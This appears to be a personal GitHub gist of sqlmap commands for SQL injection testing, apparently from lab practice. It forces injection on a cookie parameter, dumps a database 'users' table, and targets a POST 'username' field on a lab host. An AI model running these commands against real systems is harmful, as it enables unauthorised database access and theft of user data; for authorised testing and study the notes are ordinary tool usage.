Skip to content

Instantly share code, notes, and snippets.

@leveled
Last active January 19, 2021 14:29
Show Gist options
  • Save leveled/b008163e6fd8c184da85aa1af23093fc to your computer and use it in GitHub Desktop.
Save leveled/b008163e6fd8c184da85aa1af23093fc to your computer and use it in GitHub Desktop.
SQLMap Cheatsheet
#Forcing injection on a cookie
sqlmap -r blindsqli2.req -random-agent -force-ssl -p "TrackingId" --param-filter='COOKIE' --skip='session' --level=2
#Dumping user table with 4 threads
sqlmap -r blindsqli2.req -random-agent -force-ssl --dump -T users --threads=4
#Post Request
root@localhost:~/thinc-network/machines/10.11.1.252# sqlmap -r post -p username
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment